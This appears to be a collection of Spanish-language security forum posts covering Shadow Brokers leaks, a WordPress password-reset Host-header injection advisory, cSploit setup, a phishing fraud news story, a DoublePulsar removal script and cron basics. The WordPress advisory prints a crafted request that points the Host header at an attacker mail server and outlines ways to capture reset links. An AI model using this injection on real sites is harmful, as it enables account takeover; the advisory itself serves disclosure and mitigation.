Puedes obervar el código de esta herrmienta: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

También he encontradoYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Loginde como crear una tool en C para descargar videos de youtube.


En la red hay bastante info, es cosa de buscar.

Aquí tienes el repo de GitHub: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

TIene web oficial donde lo puedes comrpar: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

También buscando en google hay bastantes entradas, no se si estarán limpias o con regalito: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Encontré esto:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Parece que fue hace tiempo, deduzco que por una discusión. El perfil de twitter trata temas de seguridad informática. Si quieres más info puedes intentar usar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y buscar el hilo de la discusión en el foro.

¿Has revisado wl link?

Son los documentos oficiales de la filtración.

Aquí tienes los archivos de la filtración de Shadow Brokers:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Aparte, puedes entrar en la web de Wikileaks o buscar por google.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, no deberia pedirte contraseña, quizas te esta pidiendo las credenciales de administrador si no estas como root.

Te aconsejo leer este post: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Y pasarte por aquí: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Recientemente, el 3 de mayo, se publicó una nueva vulnerabilidad (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) que afecta a todas las versiones de Wordpress, incluyendo la última versión 4.7.4, que puede permitir a un atacante resetear remotamente la contraseña y acceder con cualquier usuario.

La vulnerabilidad está en la página de solicitud de restablecimiento de contraseña, concretamente en la posibilidad de modificar el contenido de la variable SERVER_NAME en la función wp-includes/pluggable.php:

if ( !isset( $from_email ) ) {

        // Get the site domain and get rid of www.
        $sitename = strtolower( $_SERVER['SERVER_NAME'] );
        if ( substr( $sitename, 0, 4 ) == 'www.' ) {
                $sitename = substr( $sitename, 4 );
        }

        $from_email = 'wordpress@' . $sitename;
}

Wordpress utiliza la variable SERVER_NAME para formar la cabecera From/Return-Path del correo.  El problema es que la mayoría de los servidores web, como Apache, por defecto setean SERVER_NAME con el hostname provisto por el cliente (dentro de la cabecera HTTP_HOST):

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como SERVER_NAME puede ser modificado, se podrá cambiar el Host en la cabecera:

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

y el resultado es que $from_email en Wordpress será:

[email protected]

De esta manera, se generará un correo saliente con esa dirección en From/Return-Path:

------[ ejemplo de correo generado ]-----

Subject: [CompanyX WP] Password Reset
Return-Path: <[email protected]>
From: WordPress <[email protected]>
Message-ID: <[email protected]>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:

<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

-------------------------------

Si se intercepta este correo y/o se repele en destino para que sea enviado de vuelta a la dirección de correo maliciosa, se podrá obtener el enlace de reset y actuar en consecuencia.

El autor contempla tres escenarios:

- Si el atacante conoce previamente el buzón del usuario administrador, la dirección del buzón puede ser atacada por medio de DoS lo que hace que el correo de restablecimiento de contraseña sea rechazado o imposible de entregar. En este momento, el correo se enviará a la dirección construida por el atacante.

- La característica "autoresponder" de algunos buzones devolverá el contenido del mensaje como un archivo adjunto al remitente.

- Enviado repetidos mensajes para restablecer la contraseña al buzón de destino, forzando al usuario a responder a uno, cuando el contenido de la respuesta generalmente se refiere al cuerpo del mensaje anterior.

En definitiva, si se conoce el administrador o la dirección de correo electrónico de cualquier usuario de destino, se puede obtener el enlace de restablecimiento de contraseña por estos u otros métodos y, por ende, restablecer la contraseña de la cuenta de cualquier usuario.

De momento no hay una solución oficial, pero para paliar el problema se recomienda forzar un nombre estático para UseCanonicalName.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Autor: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¿Que es cSploit?

cSploit es una suite se seguridad para análisis de redes y pentesting desde el móvil.

Con cSploit podrás mapear tu red,descubrir servicios activos, buscar vulnerabilidades,realizar ataques es MitM,manipular trafico de red en tiempo real,etc.. una joya

Instalacion

Instalar cSploit es simple puesto que lo podemos instalar fácilmente desde fdroid, pero antes de instalarlo tenemos que tener en cuenta que necesitamos una serie de requisitos para que este funcione correctamente:

    - Telefono rooteado
    - BusyBox instalado

cSploit necesita que seas root del teléfono, puesto que hace uso de funciones y comandos de root, que no están disponible de modo "normal" por defecto, cada modelo de teléfono tiene un modo para rootearlo, por lo que dejamos esto en tus manos Busybox es conocido como la "navaja suiza" de los entornos linux, puesto que es un paquete que provee, la mayoría de las utilidades disponibles para sistemas linux de las que hace uso cSploit para hacer su "magia"

Instalando Busybox

Busybox este disponible en el market privativo de google, pero como nosotros hace tiempo que mandamos a freír gárgaras las gapps y sus "troyanos" vamos a mostrar un método alternativo para tener busybox en nuestros teléfonos:

    - Descargamos el sdk de android para disponer de adb como indicamos en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - Descargamos la versión apropiada de busybox para nuestra arquitectura de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    - Usando adb montamos la partición del sistema con permisos de escritura

Entramos en la shell del teléfono

Citaradb shell

Entramos como root para poder montar el sistema con permisos de escritura

 su

montamos el sistema con permisos de escritura

mount -o rw,remount,rw /system

salimos del root y desde adb copiamos nuestro busybox a la tarjeta SD(por ejemplo)

adb push busybox-armv7l /mnt/extSdCard

Entramos como root al directorio del sistema y aplicamos permisos 755 al archivo

cd /system/xbin

Copiamos busybox a la carpeta del sistema

cp busybox-armv7l /system/xbin

Aplicamos los permisos necesarios al archivo

chmod 7555 busybox-armv7l

Instalamos busybox

./busybox-armv7l --install -s /system/xbin

Reiniciamos

reboot

Una vez instalado, solo tenemos que conectarnos a una red wifi y empezar a trastear ofrece muchas herramientas y opciones que no vamos a tratar porque daría para otro articulo solo pongo algunos ejemplos:



Seleccionamos  objetivo:
      - Elegimos modulo para ejecutar



      - Elegimos opcion de ataque





Os podeis hacer una idea solo con los pantallas lo que nos ofrece esta magnifica herramienta que incluye soporte con mfm(Meta Sploit Framework) de base.

Happy Hacking

No se si he entendido muy bien tu pregunta. El pc con el que te conectas supogo que tiene una ip, con esa ACL deniegas cualquier tipo de tráfico desde cualquier ip. Todas las ACL tienen un "deny any any" implicito al final. Es decir, si una ACL no tiene una sentencia "permit", se denegará todo el tráfico.

Un uso bastante útil para esa sentencia sería añadirle el valor "log":

Citardeny any any log

Con esto puedes examinar el funcionamiento de tu ACL y que tráfico estás bloqueando.

Un príncipe nigeriano se conforma con los centavos que tienes en tu cuenta bancaria, pero el lituano Evaldas Rimasauskas aspiró a objetivos mucho, mucho más grandes. El pasado mes de marzo este hombre You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login por haber perpetrado una campaña de phishing queYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Ambas empresas habían elegido mantener sus identidades como un secreto, pero de acuerdo a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Loginse trataba de Google y Facebook. Ambas compañías terminaron admitiendo haber sido las víctimas del caso. Según las fuentes de Fortune, este tipo de estafas son más comunes de lo que se esperaría.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, Rimasauskas inició sus planes en 2013. Falsificó direcciones de email, recibos y sellos corporativos para hacerse pasar por el fabricante de hardware taiwanes Quanta Computer. Esta empresa distribuye suministros a varios gigantes de Sillicon Valley, como Apppe y Amazon.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login con el mismo nombre que esa compañía asiática. A continuación, abrió cuentas mantenidas y controladas por él mismo en bancos de Chipre y Letonia. Después de eso, comenzó su timo de correo electrónico. Comenzó a enviar correos electrónicos de phishing a las compañías víctimas en nombre de la empresa asiática legítima. Debido a que la compañía falsa tenía el mismo nombre, las víctimas tomaron los correos electrónicos de phishing como legítimos.

El objetivo de esto era engañar a las tecnológicas para que le pagaran por piezas de ordenadores, y el plan funcionó. En un periodo de dos años el impostor convenció a los departamentos de contabilidad de Google y Facebook de hacer transferencias de decenas de millones de dólares.

Cuando las empresas se dieron cuenta de lo que estaba pasando, Rimasauskas ya se había hecho con unos 100 millones de dólares en pagos recibidos y supuestamente los guardó en varios bancos a través de Europa. Tanto Facebook como Google afirman haber recuperado la mayoría de los fondos y han estado cooperando con las autoridades.

Evaldas Rimasauskas niega las acusaciones y se encuentra peleando por su extradición desde Lituania donde se está bajo custodia por las autoridades. La moraleja de la historia es que si dos de las empresas de tecnología más grandes del mundo pueden ser víctimas del scam, básicamente cualquiera es vulnerable y por ello es mejor tomar todas las medidas preventivas.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Aquí se responde a una duda similar a la tuya, creo que es lo que buscas:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Para montar labs de máquinas virtuales necesitas un software de virtualización como VirtualBox o VmWare.

DoublePulsar es una puerta trasera que se aprovechaba de una vulnerabilidad en el protocolo SMB de Windows y que podía permitir a la NSA conectarse de forma remota a cualquier ssitema para recopilar información sobre él. Tan pronto como la vulnerabilidad se dio a conocer, Microsoft lanzó un parche de seguridad para sus sistemas operativos (desde Windows Vista hasta Windows 10) con el que evitar que esta vulnerabilidad pudiera ser utilizada de nuevo. Sin embargo, el parche no eliminaba la puerta trasera DoublePulsar, la cual sigue estando presente en miles de ordenadores por todo el mundo.

Se ha publicado un script en Python, llamado You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para detectar este backdoor y eliminarlo de los ordenadores infectados.

python detect_doublepulsar_smb.py –ip 192.168.1.1

Si la herramienta no detecta amenaza en nuestro sistema no tenemos de qué preocuparnos, sin embargo, en caso de que la puerta trasera de la NSA esté en nuestro ordenador, el programa nos devolverá un mensaje como:



En ese caso, el siguiente paso será identificar la amenaza y, para ello, vamos a teclear en el terminal:

python detect_doublepulsar_rdp.py –file ips.list –verbose –threads 1

Tras unos segundos, una vez identificada la amenaza, el último paso será proceder con la eliminación de DoublePulsar utilizando el comando:

python2 detect_doublepulsar_smb.py –ip 192.168.1.1 –uninstall

Una vez eliminada, no debemos olvidarnos de instalar los últimos parches de seguridad de Windows para solucionar esta vulnerabilidad y evitar que, a través de ella, nos vuelvan a infectar con DoublePulsar.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es similar a un administrador de tareas que nos permite programar la ejecución de comandos o scripts. Funciona a través del fichero Crontab, que normalmente se encuentra situado en /etc/crontab.
Crontab es el fichero que contiene los parámetros que determinarán la ejecución de Cron. Comprobará la fecha y hora de ejecución del script o del comando y los permisos de ejecución. Hay que aclarar que existe un fichero Crontab por cada usuario en el equipo.



Parámetros:

• PATH: directorios en los cuales Cron buscará el comando a ejecutar.
• MAIL TO: Cron enviará un correo al usuario que se especifique en este variable.
• HOME: directorio raíz del comando cron.
• m: minuto en el que se ejecutará el script. [0-59]
• h: hora. [0-23]
• dom: día del mes. [0-31]
• dow: día de la semana. [0-7] | [mon-tue-wed-thu-fri-sat-sun]
• user: usuario que ejecutará el comando o script.
• command: comando o a la ruta absoluta del script a ejecutar.

Cadenas especiales para definir rangos:

• @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login: ejecuta una vez, al inicio
• @yearly: ejecuta sólo una vez al año: 0 0 1 1 *
• @annually: igual que @yearly
• @monthly: ejecuta una vez al mes, el primer día: 0 0 1 * *
• @weekly: ejecuta el primer minuto de la primer hora de la semana. 0 0 * * 0.
• @daily: diario, a las 12:00A.M. 0 0 * * *
• @midnight: igual que @daily
• @hourly: ejecuta el primer minuto de cada hora: 0 * * * *

Existen diversas formas de utilizar Cron. La forma más segura, para evitar errores, es editando directamente el fichero crontab que acabamos de ver. En casi todos los sistemas Linux, suelen existir también los siguientes ficheros, que pueden ser editados para ejecutarse, como podreís intuir, cada hora, cada día, cada semana o cada mes:

• cron.hourly
• cron.daily
• cron.weekly
• cron.monthly

También podemos usar el comando Crontab para programar nuestras tareas:

crontab [-u usuario] archivo
crontab [-u usuario] [-l | -r | -e] [-i] [-s] 

Parámetros:

• u: usuario que ejecutara el comando o script.
• l: lista las tareas programadas.
• r: elimina el crontab actual.
• e: abrir o editar archivo crontab.

Ejemplos de tareas:

• Ejecutar script You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a las 10:15 a.m. todos los días:

15 10 * * * usuario /home/usuario/scripts/actualizar.sh

• Usuario root ejecutará una actualización todos los domingos (sun) a las 10:45 a.m:

45 10 * * sun root apt-get -y update

Un saludo HATI

    Acción:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


    Aventura:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


    Rol:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


    Simulación:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


    Estrategia:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


    Deportivo:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


    Otros:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


    Print and play:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si encuentras un fallo en la web de compra de billetes sería posible, aunque imagino que sabes que también sería ilegal.

Aquí tienes un post recopilatorio con algunos sitios bastante buenos para comenzar a practicar:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¿Has probado con esto? ===> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Podrías usar también el buscador del foro. Cuando tengas una duda más concreta, te podremos ayudar mejor.

Citar1- Si algún vecino logra acceder a mi router que le puede hacer al router o a los dispositivos?

Dependerá de los conocimientos de la persona que lo haya hecho.

Citar2-Es posible obtener la contraseña siempre y cuando se encuentre en alguna base de datos por fabricante y modelo?

No se si entiendo bien tu pregunta, pero hay diferentes formas de conseguir acceso a un router, no solo por fuerza bruta.